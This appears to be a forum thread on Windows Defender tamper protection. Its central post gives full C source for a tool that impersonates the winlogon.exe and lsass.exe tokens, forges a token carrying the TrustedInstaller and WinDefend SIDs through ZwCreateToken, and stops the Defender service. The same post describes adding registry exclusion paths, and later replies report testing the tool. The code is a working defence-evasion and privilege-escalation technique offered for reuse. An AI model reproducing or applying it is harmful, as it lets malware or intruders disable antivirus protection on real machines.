Windows Defender - The worst AV ever?

before …. if you remove defender completely …
and try this command ….
it was return error code, not *False*

Code:

@(Get-MpComputerStatus).IsTamperProtected

But
in the new version, it return *False*
no folder, no service, no component's
and still it work ,,, its like a dead alive zombie
its not function, but still you get response

 

You need to login to view this posts content.

 

You need to login to view this posts content.

 

You need to login to view this posts content.

 

You need to login to view this posts content.

 

You need to login to view this posts content.

 

There are many methods, for the moment I used one of them without having to write a complex EFI driver that could also manipulate from RING-0 (controlling the entire stack). I think in future versions of Windows Defender I will come to grips with this. Today, all I need to do, for my own purposes, is to make an exception to HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths, so that in the latest 11, I can still stop and start Defender on demand. There are subtitles at the end of the video on how to stop it, but these ways are actually several (without rebooting, of course)

 

"StopDefender.c" written in C using WinAPI. I use the undocumented "ntdll.h" header file to handle low-level system operations.
All operations are low-level and deal with access rights, identity and security. The coding requires a good knowledge of Windows and its security architecture.

For the console, all functions are written in C style, but for windows I mix in C++, but also APIs.
The order of functions and calls in the program is logical and follows the typical control flow pattern in a system program. Token holders are created, then manipulate those tokens and finally use them to perform the desired actions.

In the main function, the order of calling the ImpersonateProcessTokenByName function can be a bit confusing. First I forge the token for "winlogon.exe" and then for "lsass.exe", but I don't use the first token because it's in another *.cpp file

Basically using StopDefender and cmdt I am able to stop windows defender, cut it with TrustedInstaller permissions, including all sorts of files, registry keys HKLM\SYSTEM\CurrentControlSet\Services\WD*, registry classes without restarting the computer. If there is a need for such an uninstaller then please write, in a free moment I can slap it together

Code:

#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <lmcons.h>
#include <tchar.h>
#include <sddl.h>
#include "ntdll.h"
#include "util.h"

PVOID GetInfoFromToken(HANDLE current_token, TOKEN_INFORMATION_CLASS tic)
{
    DWORD n;
    PVOID data;

    if (!GetTokenInformation(current_token, tic, 0, 0, &n) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)
        return 0;

    data = (PVOID)malloc(n);

    if (GetTokenInformation(current_token, tic, data, n, &n))
        return data;
    else
        free(data);

    return 0;
}

HANDLE CreateTokenWinDefend(HANDLE base_token)
{
    LUID luid;
    PLUID pluidAuth;
    NTSTATUS ntStatus;
    LARGE_INTEGER li;
    PLARGE_INTEGER pli;
    //    DWORD sessionId;
    HANDLE elevated_token;

    PTOKEN_PRIVILEGES privileges;
    PTOKEN_OWNER owner;
    PTOKEN_PRIMARY_GROUP primary_group;
    PTOKEN_DEFAULT_DACL default_dacl;
    PTOKEN_GROUPS groups;
    SECURITY_QUALITY_OF_SERVICE sqos = { sizeof(sqos), SecurityImpersonation, SECURITY_STATIC_TRACKING, FALSE };
    OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, 0, 0, 0, &sqos };
    SID_IDENTIFIER_AUTHORITY nt = SECURITY_NT_AUTHORITY;
    PSID_AND_ATTRIBUTES pSid;
    //    PISID pSidSingle;
    TOKEN_USER userToken;
    TOKEN_SOURCE sourceToken = { { '!', '!', '!', '!', '!', '!', '!', '!' }, { 0, 0 } };
    PSID lpSidOwner = NULL;
    LUID authid = SYSTEM_LUID;
    PSID group1, group2;

    // TrustedInstaller SID
    BOOL t = ConvertStringSidToSid(TEXT("S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464"), &group2);

    //Windefend SID
    t = ConvertStringSidToSid(TEXT("S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736"), &group1);

    _ZwCreateToken ZwCreateToken = (_ZwCreateToken)GetProcAddress(LoadLibraryA("ntdll"), "ZwCreateToken");
    if (ZwCreateToken == NULL) {
        _tprintf(TEXT("[-] Failed to load ZwCreateToken: %d\n"), GetLastError());
        return NULL;
    }

    DWORD dwBufferSize = 0;
    PTOKEN_USER user;
    user = (PTOKEN_USER)GetInfoFromToken(base_token, TokenUser);

    AllocateAndInitializeSid(&nt, 1, SECURITY_LOCAL_SYSTEM_RID,
        0, 0, 0, 0, 0, 0, 0, &lpSidOwner);

    userToken.User.Sid = lpSidOwner;
    userToken.User.Attributes = 0;

    AllocateLocallyUniqueId(&luid);
    sourceToken.SourceIdentifier.LowPart = luid.LowPart;
    sourceToken.SourceIdentifier.HighPart = luid.HighPart;

    privileges = (PTOKEN_PRIVILEGES)GetInfoFromToken(base_token, TokenPrivileges);

    groups = (PTOKEN_GROUPS)GetInfoFromToken(base_token, TokenGroups);
    primary_group = (PTOKEN_PRIMARY_GROUP)GetInfoFromToken(base_token, TokenPrimaryGroup);
    default_dacl = (PTOKEN_DEFAULT_DACL)GetInfoFromToken(base_token, TokenDefaultDacl);

    pSid = groups->Groups;
    for (int i = 0; i < static_cast<int>(groups->GroupCount); ++i, pSid++)

    {
        PISID piSid = (PISID)pSid->Sid;
        if (piSid->SubAuthority[piSid->SubAuthorityCount - 1] == SECURITY_AUTHENTICATED_USER_RID) {
            pSid->Sid = group1;
            pSid->Attributes = SE_GROUP_ENABLED;
        }

        else if (piSid->SubAuthority[piSid->SubAuthorityCount - 1] == SECURITY_WORLD_RID) {
            pSid->Sid = group2;
            pSid->Attributes = SE_GROUP_ENABLED;
        }
        else if (piSid->SubAuthority[piSid->SubAuthorityCount - 1] == DOMAIN_ALIAS_RID_ADMINS) {
            pSid->Attributes = SE_GROUP_ENABLED;
        }
        else {
            pSid->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY;
            pSid->Attributes &= ~SE_GROUP_ENABLED;
        }
    }

    owner = (PTOKEN_OWNER)LocalAlloc(LPTR, sizeof(PSID));
    owner->Owner = user->User.Sid;
    //owner->Owner = GetLocalSystemSID();

    pluidAuth = &authid;
    li.LowPart = 0xFFFFFFFF;
    li.HighPart = 0xFFFFFFFF;
    pli = &li;
    ntStatus = ZwCreateToken(&elevated_token,
        TOKEN_ALL_ACCESS,
        &oa,
        TokenImpersonation,
        pluidAuth,
        pli,
        user,
        //&userToken,
        groups,
        privileges,
        owner,
        primary_group,
        default_dacl,
        &sourceToken
    );

    if (ntStatus == STATUS_SUCCESS)
        return elevated_token;
    else
        _tprintf(TEXT("[-] Failed to create new token: %d %08x\n"), GetLastError(), ntStatus);

    FreeSid(lpSidOwner);
    if (groups) LocalFree(groups);
    if (privileges) LocalFree(privileges);

    return NULL;
}

BOOL ImpersonateProcessTokenByName(LPCTSTR pname, PHANDLE retHandle) {
    HANDLE tokenHandle = NULL;
    HANDLE duplicateTokenHandle = NULL;
    DWORD PID_TO_IMPERSONATE = GetProcessByName(pname);
    if (PID_TO_IMPERSONATE == 0) {
        _tprintf(_T("[-] %s process not found\n"), pname);
        return FALSE;
    }
    else
        _tprintf(_T("[+] %s process found!\n"), pname);
    HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, PID_TO_IMPERSONATE);
    if (GetLastError() == NULL)
        _tprintf(_T("[+] %s OpenProcess() success!\n"), pname);
    else
    {
        _tprintf(_T("[-] %s OpenProcess() Return Code: %p\n"), pname, processHandle);
        _tprintf(_T("[-] %s OpenProcess() Error: %d\n"), pname, GetLastError());
        return FALSE;
    }
    BOOL getToken = OpenProcessToken(processHandle, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY | TOKEN_IMPERSONATE, &tokenHandle);
    if (getToken)
        _tprintf(_T("[+] %s OpenProcessToken() success!\n"), pname);
    else
    {
        _tprintf(_T("[-] %s OpenProcessToken() Return Code: %p\n"), pname,  (LPVOID)tokenHandle);
        _tprintf(_T("[-] %s OpenProcessToken() Error: %d\n"), pname, GetLastError());
        return FALSE;
    }
    if (!DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenImpersonation, retHandle)){
        _tprintf(_T("[-] %s OpenProcessToken() Error: %d\n"), pname, GetLastError());
        return FALSE;
    }
    _tprintf(_T("[+] %s DuplicateTokenEx() success!\n"), pname);
    BOOL impersonateUser = ImpersonateLoggedOnUser(*retHandle);
    if (GetLastError() == NULL)
    {
        _tprintf(_T("[+] %s ImpersonatedLoggedOnUser() success!\n"), pname);
        _tprintf(_T("[+] %s Current user is: %s\n"), pname, get_username());
    }
    else
    {
        _tprintf(_T("[-] %s ImpersonatedLoggedOnUser() Return Code: %i\n"), pname, impersonateUser);
                _tprintf(_T("[-] %s ImpersonatedLoggedOnUser() Error: %i\n"), pname, GetLastError());
        return FALSE;
    }
    CloseHandle(tokenHandle);
    CloseHandle(processHandle);
    _tprintf(_T("[+] Current user is: %s\n"), get_username());
    return TRUE;
}

int main(int argc, TCHAR* argv[]) {
    HANDLE impersonatedTokenHandle = NULL;
    _tprintf(_T("[+] Current user is: %s\n"), get_username());

    if (!ImpersonateProcessTokenByName(_T("winlogon.exe"), &impersonatedTokenHandle))
        exit(1);

    if (!ImpersonateProcessTokenByName(_T("lsass.exe"), &impersonatedTokenHandle))
        exit(1);

     impersonatedTokenHandle = CreateTokenWinDefend(impersonatedTokenHandle);
     if (impersonatedTokenHandle == NULL)
         exit(1);

     _tprintf(_T("[+] CreateTokenWinDefend success!\n"));
    if (ImpersonateLoggedOnUser(impersonatedTokenHandle))
    {
        _tprintf(_T("[+] ImpersonatedLoggedOnUser() success!\n"));
        _tprintf(_T("[+] Current user is: %s\n"), get_username());
    }
    else
    {
        _tprintf(_T("[-] ImpersonatedLoggedOnUser() Error: %i\n"), GetLastError());
        return 1;
    }

    if (StopDefenderService()) {
        _tprintf(_T("[+] StopDefenderServices success!\n"));
    }
    else {
        _tprintf(_T("[-] StopDefenderServices Error: %i\n"), GetLastError());
    }

    return 0;
}

 

@wesmar
Your approach seems interesting could you open a new dedicated thread for it?

 

Hi, OK, but it's already tomorrow after work. I'm going to bed because at my place 1.30 at night
Greetings, Marek

 

You need to login to view this posts content.

 

I opened a new thread where I described in quite some detail the idea of creating this tool.
Stopping and starting the Windows Defender service on demand. | My Digital Life Forums
For now it is awaiting moderation.
--- --- ---
Greetings, Marek

 

The requested thread could not be found.

 

Thread Status: Awaiting moderation before being displayed publicly.

I see it, unfortunately I have no idea if there is a moderator here. Maybe it will take another day, week, month?
I don't know. I write mainly on our popular forum elektroda.pl, I post exclusion updates there by drag&drop. And here still waiting, it's a pity. The thread is quite large, if the moderator does not accept it then I do not see the point of remaining active here. Publication is about an hour of time, and moderation max. 3 minutes of reading. I have been a reader since 2012, such a bit of a Sunday reader from time to time.
Below is a fractional screenshot of this thread:

 

... you most likely haven't reached the minimum requirements (Number of posts?) in order to open a NEW thread

 

You need to login to view this posts content.

 

Actually, I have very few posts here and maybe that's why I can't open, so I inserted in this thread. Some media may have been cut off. I will ask the moderator to delete, this one, if it opens that one because I would release some cool updates, such as exclusions directly to the registry by drag and drop....

 

wesmar
tried your app, from the console version with Tamper on, but it fail
from GUI it works fine, but switching from Disable - Enable makes the program fail
so I start gui again and disable work again even with tamper setting on

 

You need to login to view this posts content.